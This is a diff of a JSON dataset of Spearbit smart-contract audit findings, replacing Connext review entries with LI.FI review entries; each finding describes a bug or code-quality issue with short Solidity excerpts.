other swap functions which check that the amount transferred is equal to dx. As a result, overwriting dx with tokenFrom.balanceOf(address(this)).sub(beforeBalance) allows for fee-on- transfer tokens to work as intended.", + "title": "Amount swapped not emitted", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The emits LiFiTransferStarted() and LiFiTransferCompleted() dont emit the amount after the swap (e.g. the real amount that is being bridged / transferred to the receiver). This might be useful to add. 59 event LiFiTransferStarted( bytes32 indexed transactionId, string bridge, string bridgeData, string integrator, address referrer, address sendingAssetId, address receivingAssetId, address receiver, uint256 amount, uint256 destinationChainId, bool hasSourceSwap, bool hasDestinationCall ); event LiFiTransferCompleted( bytes32 indexed transactionId, address receivingAssetId, address receiver, uint256 amount, uint256 timestamp );", "labels": [ "Spearbit", - "Connext", - "Severity: Medium Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "xcall() may erroneously overwrite prior calls to bumpTransfer()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The bumpTransfer() function allows users to increment the relayer fee on any given transferId without checking if the unique transfer identifier exists. As a result, a subsequent call to xcall() will overwrite the s.relayerFees mapping, leading to lost funds.", + "title": "Comment is not compatible with code", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "On the HyphenFacet, Comment is mentioned that approval is given to Anyswap. But, approval is given to Hyphen router. function _startBridge(HyphenData memory _hyphenData) private { // Check chain id if (block.chainid == _hyphenData.toChainId) revert CannotBridgeToSameNetwork(); if (_hyphenData.token != address(0)) { // Give Anyswap approval to bridge tokens LibAsset.maxApproveERC20(IERC20(_hyphenData.token), _hyphenData.router, _hyphenData.amount); }", "labels": [ "Spearbit", - "Connext", - "Severity: Medium Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "_handleExecuteLiquidity doesnt consistently check for receiveLocalOverrides", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The function _handleExecuteLiquidity() initially checks for receiveLocal but does not check for receiveLocalOverrides. Later on it does check for both of values. function _handleExecuteLiquidity(... ) ... { ... if ( !_args.params.receiveLocal && // doesn't check for receiveLocalOverrides s.routerBalances[_args.routers[0]][_args.local] < toSwap && s.aavePool != address(0) ) { ... if (_args.params.receiveLocal || s.receiveLocalOverrides[_transferId]) { // extra check return (toSwap, _args.local); } } 22 As a result, the portal may pay the bridge user in the adopted asset when they opted to override this behaviour to avoid slippage conditions outside of their boundaries, potentially leading to an unwarranted reception of funds denominated in the adopted asset.", + "title": "Move whitelist to LibSwap.swap()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The function LibSwap.swap() is dangerous because it can call any function of any contract. If this is exposed to the outside (like in GenericBridgeFacet), is might enable access to transferFrom() and thus stealing tokens. Also see issue \"Too generic calls in GenericBridgeFacet allow stealing of tokens\" Luckily most of the time LibSwap.swap() is called via _executeSwaps(), which has a whitelist and reduces the risk. To improve security it would be better to integrate the whitelists in LibSwap.swap(). Note: also see issue \"_executeSwaps of Executor.sol doesnt have a whitelist\" library LibSwap { function swap(bytes32 transactionId, SwapData calldata _swapData) internal { if (!LibAsset.isContract(_swapData.callTo)) revert InvalidContract(); ... (bool success, bytes memory res) = _swapData.callTo.call{ value: nativeValue ,! }(_swapData.callData); ... } } contract SwapperV2 is ILiFi { function _executeSwaps(...) ... { ... if ( !(appStorage.dexAllowlist[currentSwapData.approveTo] && appStorage.dexAllowlist[currentSwapData.callTo] && appStorage.dexFuncSignatureAllowList[bytes32(currentSwapData.callData[:8])]) ) revert ContractCallNotAllowed(); LibSwap.swap(_lifiData.transactionId, currentSwapData); } } }", "labels": [ "Spearbit", - "Connext", - "Severity: Medium Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Router signatures can be replayed when executing messages on the destination domain", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "Connext bridge supports near-instant transfers by allowing users to pay a small fee to routers for providing them with liquidity. Gelato relayers are tasked with taking in bids from liquidity providers who sign a message consisting of the transferId and path length. The path length variable only guarantees that the message they signed will only be valid if _args.routers.length - 1 routers are also selected. However, it does not prevent Gelato relayers from re-using the same signature multiple times. As a result, routers may unintentionally provide more liquidity than expected.", + "title": "Redundant check on the HyphenFacet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "In the HyphenFacet, there is a condition which checks source chain is different than destination chain id. However, the conditional check is already placed on the Hyphen contracts. _depositErc20, _depositNative) function _startBridge(HyphenData memory _hyphenData) private { // Check chain id if (block.chainid == _hyphenData.toChainId) revert CannotBridgeToSameNetwork(); }", "labels": [ "Spearbit", - "Connext", - "Severity: Medium Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "diamondCut() allows re-execution of old updates", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The function diamondCut() of LibDiamond verifies the signed version of the update parameters. It checks the signed version is available and a sufficient amount of time has passed. However it doesnt prevent multiple executions and the signed version stays valid forever. This allows old updates to be executed again. Assume the following: facet_x (or function_y) has value: version_1. then: replace facet_x (or function_y) with version_2. then a bug is found in version_2 and it is rolled back with: replace facet_x (or function_y) with ver- sion_1. 23 then a (malicious) owner could immediately do: replace facet_x (or function_y) with version_2 (be- cause it is still valid). Note: the risk is limited because it can only executed by the contract owner, however this is probably not how the mechanism should work. library LibDiamond { function diamondCut(...) ... { ... uint256 time = ds.acceptanceTimes[keccak256(abi.encode(_diamondCut, _init, _calldata))]; require(time != 0 && time < block.timestamp, \"LibDiamond: delay not elapsed\"); ... } }", + "title": "Check input amount equals swapped amount", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The bridge functions dont check that input amount ( _bridgeData.amount or msg.value) is equal to the swapped amount (_swapData[0].fromAmount). This could lead to funds remaining in the LiFi Diamond or Executor. Luckily noLeftovers() or checks on startingBalance solve this by sending the remaining balance to the origina- tor or receiver. However this is fixing symptoms instead of preventing the issue. function swapAndStartBridgeTokensViaOmniBridge( ... LibSwap.SwapData[] calldata _swapData, BridgeData calldata _bridgeData ) ... { ... uint256 amount = _executeAndCheckSwaps(_lifiData, _swapData, payable(msg.sender)); ... }", "labels": [ "Spearbit", - "Connext", - "Severity: Medium Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Not always safeApprove(..., 0)", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "Some functions like _reconcileProcessPortal of BaseConnextFacet and _swapAssetOut of As- setLogic do safeApprove(..., 0) first. contract NomadFacet is BaseConnextFacet { function _reconcileProcessPortal( ... ) ... { ... // Edge case with some tokens: Example USDT in ETH Mainnet, after the backUnbacked call there ,! could be a remaining allowance if not the whole amount is pulled by aave. // Later, if we try to increase the allowance it will fail. USDT demands if allowance is not 0, ,! it has to be set to 0 first. // Example: ,! ,! [ParaSwapRepayAdapter.sol#L138-L140](https://github.com/aave/aave-v3-periphery/blob/ca184e5278bcbc1 0d28c3dbbc604041d7cfac50b/contracts/adapters/paraswap/ParaSwapRepayAdapter.sol#L138-L140) c SafeERC20.safeApprove(IERC20(adopted), s.aavePool, 0); SafeERC20.safeIncreaseAllowance(IERC20(adopted), s.aavePool, totalRepayAmount); ... } } While the following functions dont do this: xcall of BridgeFacet. _backLoan of PortalFacet. _swapAsset of AssetLogic. execute of Executor. This could result in problems with tokens like USDT. 24 contract BridgeFacet is BaseConnextFacet { ,! function xcall(XCallArgs calldata _args) external payable nonReentrant whenNotPaused returns (bytes32) { ... SafeERC20.safeIncreaseAllowance(IERC20(bridged), address(s.bridgeRouter), bridgedAmt); ... } } contract PortalFacet is BaseConnextFacet { function _backLoan(...) ... { ... SafeERC20Upgradeable.safeIncreaseAllowance(IERC20Upgradeable(_asset), s.aavePool, _backing + ,! _fee); ... } } library AssetLogic { function _swapAsset(...) ... { ... SafeERC20.safeIncreaseAllowance(IERC20(_assetIn), address(pool), _amount); ... } } contract Executor is IExecutor { function execute( ... ) ... { ... SafeERC20.safeIncreaseAllowance(IERC20(_args.assetId), _args.to, _args.amount); ... } }", + "title": "Use same layout for facets", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The different bridge facets use different layouts for the source code. This can be seen at the call to _startBridge(). The code is easier to maintain If it is the same everywhere. 62 AmarokFacet.sol: ArbitrumBridgeFacet.sol: OmniBridgeFacet.sol: OptimismBridgeFacet.sol: PolygonBridgeFacet.sol: StargateFacet.sol: AcrossFacet.sol: CBridgeFacet.sol: GenericBridgeFacet.sol: GnosisBridgeFacet.sol: HopFacet.sol: HyphenFacet.sol: NXTPFacet.sol: AnyswapFacet.sol: WormholeFacet.sol: AxelarFacet.sol: _startBridge(_lifiData, _bridgeData, amount, true); _startBridge(_lifiData, _bridgeData, amount, true); _startBridge(_lifiData, _bridgeData, amount, true); _startBridge(_lifiData, _bridgeData, amount, true); _startBridge(_lifiData, _bridgeData, true); _startBridge(_stargateData, _lifiData, nativeFee, true); _startBridge(_acrossData); _startBridge(_cBridgeData); _startBridge(_bridgeData); _startBridge(gnosisBridgeData); _startBridge(_hopData); _startBridge(_hyphenData); _startBridge(_nxtpData); _startBridge(_anyswapData, underlyingToken, isNative); _startBridge(_wormholeData); // no _startBridge", "labels": [ "Spearbit", - "Connext", - "Severity: Medium Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "_slippageTol does not adjust for decimal differences", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "Users set the slippage tolerance in percentage. The assetLogic calculates: minReceived = (_amount * _slippageTol) / s.LIQUIDITY_FEE_DENOMINATOR Then assetLogic uses minReceived in the swap functions. The minReceived, however, does not adjust for the decimal differences between assetIn and assetOut. Users will either always hit the slippage or suffer huge slippage when assetIn and assetOut have a different number of decimals. Assume the number of decimals of assetIn is 6 and the decimal of assetOut is 18. The minReceived will be set to 10-12 smaller than the correct value. Users would be vulnerable to sandwich attacks in this case. Assume the number of decimals of assetIn is 18 and the number of decimals of assetOut is 6. The minReceived will be set to 1012 larger than the correct value. Users would always hit the slippage and the cross-chain transfer will get stuck. 25 library AssetLogic { function _swapAsset(... ) ... { // Swap the asset to the proper local asset uint256 minReceived = (_amount * _slippageTol) / s.LIQUIDITY_FEE_DENOMINATOR; ... return (pool.swapExact(_amount, _assetIn, _assetOut, minReceived), _assetOut); ... } }", + "title": "Safety check is missing on the remaining amount", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "On the FeeCollector contract, There is no safety check to ensure remaining amount doesnt under- flow and revert. function collectNativeFees( uint256 integratorFee, uint256 lifiFee, address integratorAddress ) external payable { ... ... } uint256 remaining = msg.value - (integratorFee + lifiFee);", "labels": [ "Spearbit", - "Connext", - "Severity: Medium Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Canonical assets should be keyed on the hash of domain and id", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "A canonical asset is a tuple of a (domain, id) pair. TokenRegistrys owner has the power to regis- ter new tokens in the system (See TokenRegistry.ensureLocalToken() and TokenRegistry.enrollCustom()). A canonical asset is registered using the hash of its domain and id (See TokenRegistry._setCanonicalToRepre- sentation()). Connext uses only the id of a canonical asset to uniquely identify. Here are a few references: swapStorages canonicalToAdopted It is an issue if TokenRegistry registers two canonical assets with the same id. canonical asset an unintended one might be transferred to the destination chain, of the transfers may revert. If this id fetches the incorrect", + "title": "Entire struct can be emitted", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The emit LiFiTransferStarted() generally outputs the entire struct _lifiData by specifying all Its also possible to emit the entire struct in one go. This would make the code smaller and fields of the struct. easier to maintain. function _startBridge(LiFiData calldata _lifiData, ... ) ... { ... // do actions emit LiFiTransferStarted( _lifiData.transactionId, \"omni\", \"\", _lifiData.integrator, _lifiData.referrer, _lifiData.sendingAssetId, _lifiData.receivingAssetId, _lifiData.receiver, _lifiData.amount, _lifiData.destinationChainId, _hasSourceSwap, false ); }", "labels": [ "Spearbit", - "Connext", - "Severity: Medium Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Missing checks for Chainlink oracle", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "ConnextPriceOracle.getTokenPrice() function goes through a series of oracles. At each step, it has a few validations to avoid incorrect price. If such validations succeed, the function returns the non-zero oracle price. For the Chainlink oracle, getTokenPrice() ultimately calls getPriceFromChainlink() which has the following validation if (answer == 0 || answeredInRound < roundId || updateAt == 0) { // answeredInRound > roundId ===> ChainLink Error: Stale price // updatedAt = 0 ===> ChainLink Error: Round not complete return 0; } updateAt refers to the timestamp of the round. This value isnt checked to make sure it is recent. 26 Additionally, it is important to be aware of the minAnswer and maxAnswer of the Chainlink oracle, these values are not allowed to be reached or surpassed. See Chainlink API reference for documentation on minAnswer and maxAnswer as well as this piece of code: OffchainAggregator.sol", + "title": "Redundant return value from internal function", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Callers of NXTPFacet._startBridge() function never use its return value.", "labels": [ "Spearbit", - "Connext", - "Severity: Medium Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Same params.SlippageTol is used in two different swaps", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The Connext protocol does a cross-chain transfer with the help of the Nomad protocol. to use the Nomad protocol, Connext has to convert the adopted token into the local token. For a cross-chain transfer, users take up two swaps. Adopted -> Local at the source chain and Local -> Adopted at the destination chain. BridgeFacet.sol#L299-L304 function xcall(XCallArgs calldata _args) external payable whenNotPaused nonReentrant returns (bytes32) { ... // Swap to the local asset from adopted if applicable. (uint256 bridgedAmt, address bridged) = AssetLogic.swapToLocalAssetIfNeeded( canonical, transactingAssetId, amount, _args.params.slippageTol ); ... } BridgeFacet.sol#L637 function _handleExecuteLiquidity( bytes32 _transferId, bytes32 _canonicalId, bool _isFast, ExecuteArgs calldata _args ) private returns (uint256, address) { ... // swap out of mad* asset into adopted asset if needed return AssetLogic.swapFromLocalAssetIfNeeded(_canonicalId, _args.local, toSwap, _args.params.slippageTol); ,! } The same slippage tolerance _args.params.slippageTol is used in two swaps. In most cases users cannot set the correct slippage tolerance to protect two swaps. Assume the Nomad asset is slightly cheaper in both chains. 1 Nomad asset equals 1.01 adopted asset. An expected swap would be:1 adopted -> 1.01 Nomad asset -> 1 adopted. The right slippage tolerance should be set at 1.01 and 0.98 respectively. Users cannot set the correct tolerance with a single parameter. This makes users vulnerable to MEV searchers. Also, user transfers get stuck during periods of instability.", + "title": "Change comment on the LibAsset", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The following comment is used in the LibAsset.sol contract. However, Connext doesnt have this file anymore and deleted with the following commit. /// @title LibAsset /// @author Connext /// @notice This library contains helpers for dealing with onchain transfers /// /// library LibAsset {} of assets, including accounting for the native asset `assetId` conventions and any noncompliant ERC20 transfers", "labels": [ "Spearbit", - "Connext", - "Severity: Medium Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "getTokenPrice() returns stale token prices", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "getTokenPrice() reads from the assetPrices[tokenAddress].price mapping which stores the latest price as configured by the protocol admin in setDirectPrice(). However, the check for a stale token price will never fallback to other price oracles as tokenPrice != 0. Therefore, the stale token price will be unintentionally returned.", + "title": "Integrate all variants of _executeAndCheckSwaps()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "There are multiple functions that are more or less the same: swapAndCompleteBridgeTokensViaStargate() of Executor.sol swapAndCompleteBridgeTokens() of Executor.sol swapAndExecute() of Executor.sol _executeAndCheckSwaps() of SwapperV2.sol _executeAndCheckSwaps() of Swapper.sol swapAndCompleteBridgeTokens() of XChainExecFacet As these are important functions it is worth the trouble to have one code base to maintain. For example swapAnd- CompleteBridgeTokens() doesnt check msg.value ==0 when ERC20 tokens are send. Note: swapAndCompleteBridgeTokensViaStargate() of StargateFacet.sol already uses SwapperV2.sol", "labels": [ "Spearbit", - "Connext", - "Severity: Low Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Potential division by zero if gas token oracle is faulty", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "In the event that the gas token oracle is faulty and returns malformed values, the call to reim- burseRelayerFees() in _handleExecuteTransaction() will fail. Fortunately, the low-level call() function will not prevent the transfer from being executed, however, this may lead to further issues down the line if changes are made to the sponsor vault.", + "title": "Utilize NATIVE_ASSETID constant from LibAsset", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "In the codebase, LibAsset library contains the variable which defines zero address. However, on the facets the check is repeated. Code should not be repeated and its better to have one version used everywhere to reduce likelihood of bugs. contract AcrossFacet { address internal constant ZERO_ADDRESS = 0x0000000000000000000000000000000000000000; } contract DexManagerFacet { if (_dex == 0x0000000000000000000000000000000000000000) } contract WithdrawFacet { address private constant NATIVE_ASSET = 0x0000000000000000000000000000000000000000; ... } address sendTo = (_to == address(0)) ? msg.sender : _to;", "labels": [ "Spearbit", - "Connext", - "Severity: Low Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Burn does not lower allowance", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The function _takeTokens() of BridgeRouter takes in the tokens from the sender. Sometimes it transfers them and sometimes it burns them. In the case of burning the tokens, the allowance isnt \"used up\". 28 function _takeTokens(... ) ... { ... if (tokenRegistry.isLocalOrigin(_token)) { ... IERC20(_token).safeTransferFrom(msg.sender, address(this), _amount); ... } else { ... _t.burn(msg.sender, _amount); ... } ... // doesn't use up the allowance } contract BridgeToken is Version0, IBridgeToken, OwnableUpgradeable, ERC20 { ... function burn(address _from, uint256 _amnt) external override onlyOwner { _burn(_from, _amnt); } }", + "title": "Native matic will be treated as ERC20 token", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "LiFi supports Polygon on their implementation. However, Native MATIC on the Polygon has the contract 0x0000000000000000000000000000000000001010 address. Even if, It does not pose any risk, Native Matic will be treated as an ERC20 token. contract WithdrawFacet { address private constant NATIVE_ASSET = 0x0000000000000000000000000000000000000000; // address(0) ...", "labels": [ "Spearbit", - "Connext", - "Severity: Low Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Two step ownership transfer", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The function setAdmin() transfer ownership to a new address. In case a wrong address is supplied ownership is inaccessible. The same issue occurs with transferOwnership of OwnableUpgradeable in several Nomad contracts. Additionally the Nomad contract try to prevent renounceOwnership, however, this can also be accomplished with transferOwnership to a non existing address. Relevant Nomad contracts: TokenRegistry.sol NomadBase.sol UpdaterManager.sol XAppConnectionManager.sol 29 contract ConnextPriceOracle is PriceOracle { ... function setAdmin(address newAdmin) external onlyAdmin { address oldAdmin = admin; admin = newAdmin; emit NewAdmin(oldAdmin, newAdmin); } } contract BridgeRouter is Version0, Router { ... /** * @dev should be impossible to renounce ownership; * * */ we override OpenZeppelin OwnableUpgradeable's implementation of renounceOwnership to make it a no-op function renounceOwnership() public override onlyOwner { // do nothing } }", + "title": "Multiple versions of noLeftovers modifier", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The modifier noLeftovers is defined in 3 different files: Swapper.sol, SwapperV2.sol and Ex- ecutor.sol. While the versions on Swapper.sol and Executor.sol are the same, they differ with the one in Executor.sol. Assuming the recommendation for \"Processing of end balances\" is followed, the only difference is that noLeftovers in SwapperV2.sol doesnt revert when new balance is less than initial balance. Code should not be repeated and its better to have one version used everywhere to reduce likelihood of bugs.", "labels": [ "Spearbit", - "Connext", - "Severity: Low Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Function removeRouter does not clear approvedForPortalRouters", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The function removeRouter() clears most of the fields of the struct RouterPermissionsManagerInfo except for approvedForPortalRouters. However, it is still good to also remove approvedForPortalRouters in removeRouter() because if the router were to be added again later (via setupRouter() ) or _isRouterOwnershipRenounced is set in the future, the router would still have the old approvedForPortalRouters. 30 struct RouterPermissionsManagerInfo { mapping(address => bool) approvedRouters; // deleted mapping(address => bool) approvedForPortalRouters; // not deleted mapping(address => address) routerRecipients; // deleted mapping(address => address) routerOwners; // deleted mapping(address => address) proposedRouterOwners; // deleted mapping(address => uint256) proposedRouterTimestamp; // deleted } contract RoutersFacet is BaseConnextFacet { function removeRouter(address router) external onlyOwner { ... s.routerPermissionInfo.approvedRouters[router] = false; ... s.routerPermissionInfo.routerOwners[router] = address(0); ... s.routerPermissionInfo.routerRecipients[router] = address(0); ... delete s.routerPermissionInfo.proposedRouterOwners[router]; delete s.routerPermissionInfo.proposedRouterTimestamp[router]; } }", + "title": "Reduce unchecked scope", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Both zapIn() functions in FusePoolZap.sol operate in unchecked block which means any contained arithmetic can underflow or overflow. Currently, it effects only one line in both functions: FusePoolZap.sol#L67: uint256 mintAmount = IERC20(address(fToken)).balanceOf(address(this)) - preMintBalance; FusePoolZap.sol#L104 mintAmount = mintAmount - preMintBalance; Having unchecked for such a large scope when it is applicable to only one line is dangerous.", "labels": [ "Spearbit", - "Connext", - "Severity: Low Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Anyone can self burn lp token of the AMM", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "When providing liquidity into the AMM pool, users get LP tokens. Users can redeem their shares of the liquidity by redeeming LP to the AMM pool. The current LPToken contract inherits Openzepplins ERC20BurnableUpgradeable. Users can burn their tokens by calling burn without notifying the AMM pools. ERC20BurnableUpgradeable.sol#L26-L28. Although users do not profit from this action, it brings up concerns such as: An exploiter has an easy way to pump the LP price. Burning LP is similar to donating value to the pool. While its good for the pool, this gives the exploiter another tool to break other protocols. After the cream finance attack many protocols started to take extra caution and made this a restricted function (absorbing donation) github.com/yearn/yearn-security/blob/master/disclosures/2021-10-27.md. Against the best practice. Every state of an AMM is related to price. Allowing external actors to change the AMM states without notifying the main contract is dangerous. Its also harder for a developer to build other novel AMM based on the same architecture. Note: the burn function is also not protected by nonReentrant or whenNotPaused.", + "title": "No event exists for core paths/functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Several key actions are defined without event declarations. Owner only functions that change critical parameters can emit events to record these changes on-chain for off-chain monitors/tools/interfaces. There are 4 instances of this issue: 67 contract PeripheryRegistryFacet { function registerPeripheryContract(...) ... { } } contract LibAccess { function addAccess(...) ... { } function removeAccess(...) ... { } } contract AccessManagerFacet { function setCanExecute(...) ... { } }", "labels": [ "Spearbit", - "Connext", - "Severity: Low Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Skip timeout in diamondCut() (edge case)", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "Edge case: If someone manages to get an update through which deletes all facets then the next update skips the delay (because ds.facetAddresses.length will be 0). library LibDiamond { function diamondCut(...) ... { ... if (ds.facetAddresses.length != 0) { uint256 time = ds.acceptanceTimes[keccak256(abi.encode(_diamondCut, _init, _calldata))]; require(time != 0 && time < block.timestamp, \"LibDiamond: delay not elapsed\"); } // Otherwise, this is the first instance of deployment and it can be set automatically ... } }", + "title": "Rename _receiver to _leftoverReceiver", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "In the contracts Swapper.sol, SwapperV2.sol and Executor.sol the parameter _receiver is used in various places. Its name seems to suggest that the result of the swapped tokens are send to the _receiver, however this is not the case. Instead the left over tokens are send to the _receiver. This makes the code more difficult to read and maintain. contract SwapperV2 is ILiFi { modifier noLeftovers(..., address payable _receiver) { ... } function _executeAndCheckSwaps(..., address payable _receiver) ... { ... } function _executeSwaps(..., address payable _receiver) ... { ... } }", "labels": [ "Spearbit", - "Connext", - "Severity: Low Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Limit gas for s.executor.execute()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The call to s.executor.execute() in BridgeFacet might use up all available gas. In that case, the call to callback to report to the originator might not be called because the execution stops due an out of gas error. Note: the execute() function might be retried by the relayer so perhaps this will fix itself eventually. Note: excessivelySafeCall in Executor does limit the amount of gas. contract BridgeFacet is BaseConnextFacet { function _handleExecuteTransaction(...) ... { ... (bool success, bytes memory returnData) = s.executor.execute(...); // might use all available ,! gas ... // If callback address is not zero, send on the PromiseRouter if (_args.params.callback != address(0)) { s.promiseRouter.send(...); // might not have enough gas } ... } }", + "title": "Native tokens dont need SwapData.approveTo", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The functions _executeSwaps() of both SwapperV2.sol and Swapper.sol use a whitelist to make sure the right functions in the allowed dexes are called. These checks also include a check on approveTo, however approveTo is not relevant when a native token is being used. Currently the caller of the Lifi Diamond has to specify a whitelisted currentSwapData.approveTo to be able to execute _executeSwaps() which doesnt seem logical. Present in both SwapperV2.sol and Swapper.sol: function _executeSwaps(...) ... { ... if ( !(appStorage.dexAllowlist[currentSwapData.approveTo] && appStorage.dexAllowlist[currentSwapData.callTo] && appStorage.dexFuncSignatureAllowList[bytes32(currentSwapData.callData[:8])]) ) revert ContractCallNotAllowed(); LibSwap.swap(_lifiData.transactionId, currentSwapData); } }", "labels": [ "Spearbit", - "Connext", - "Severity: Low Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Several external functions missing whenNotPaused mofifier", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The following functions dont have a whenNotPaused modifier while most other external functions do. bumpTransfer of BridgeFacet. forceReceiveLocal of BridgeFacet. repayAavePortal of PortalFacet. repayAavePortalFor of PortalFacet. Without whenNotPaused these functions can still be executed when the protocol is paused.", + "title": "Inaccurate comment on the maxApproveERC20() function", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "During the code review, It has been observed that comment is incompatible with the functionality. maxApproveERC20 function approves MAX If asset id does not have sufficient allowance. The comment can be replaced with If a sufficient allowance is not present, the allowance is set to MAX. /// @notice Gives MAX approval for another address to spend tokens /// @param assetId Token address to transfer /// @param spender Address to give spend approval to /// @param amount Amount to approve for spending function maxApproveERC20( IERC20 assetId, address spender, uint256 amount )", "labels": [ "Spearbit", - "Connext", - "Severity: Low Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Gas griefing attack on callback execution", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "When the callback is executed on the source chain the following line can revert or consume all forwarded gas. In this case, the relayer wastes gas and doesnt get the callback fee. ICallback(callbackAddress).callback(transferId, _msg.returnSuccess(), _msg.returnData());", + "title": "Undocumented contracts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "All systematic contracts are documented on the docs directory. However, several contracts are not documented. LiFi is integrated with third party platforms through API. To understand code functionality, the related contracts should be documented in the directory.", "labels": [ "Spearbit", - "Connext", - "Severity: Low Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Callback fails when returnData is empty", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "If a transfer involves a callback, PromiseRouter reverts if returnData is empty. if (_returnData.length == 0) revert PromiseRouter__send_returndataEmpty(); However, the callback should be allowed in case the user wants to report the calldata execution success on the destination chain (_returnSuccess).", + "title": "Utilize built-in library function on the address check", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "In the codebase, LibAsset library contains the function which determines whether the given assetId is the native asset. However, this check is not used and many of the other contracts are applying address check seperately. contract AmarokFacet { function startBridgeTokensViaAmarok(...) ... { ... if (_bridgeData.assetId == address(0)) ... } function swapAndStartBridgeTokensViaAmarok(... ) ... { ... if (_bridgeData.assetId == address(0)) ... } } contract AnyswapFacet { function swapAndStartBridgeTokensViaAnyswap(...) ... { ... if (_anyswapData.token == address(0)) revert TokenAddressIsZero(); ... } } contract HyphenFacet { function _startBridge(...) ... { ... if (_hyphenData.token != address(0)) ... } } contract StargateFacet { function _startBridge(...) ... { ... if (token == address(0)) ... 70 } } contract LibAsset { function transferFromERC20(...) ... { ... if (assetId == 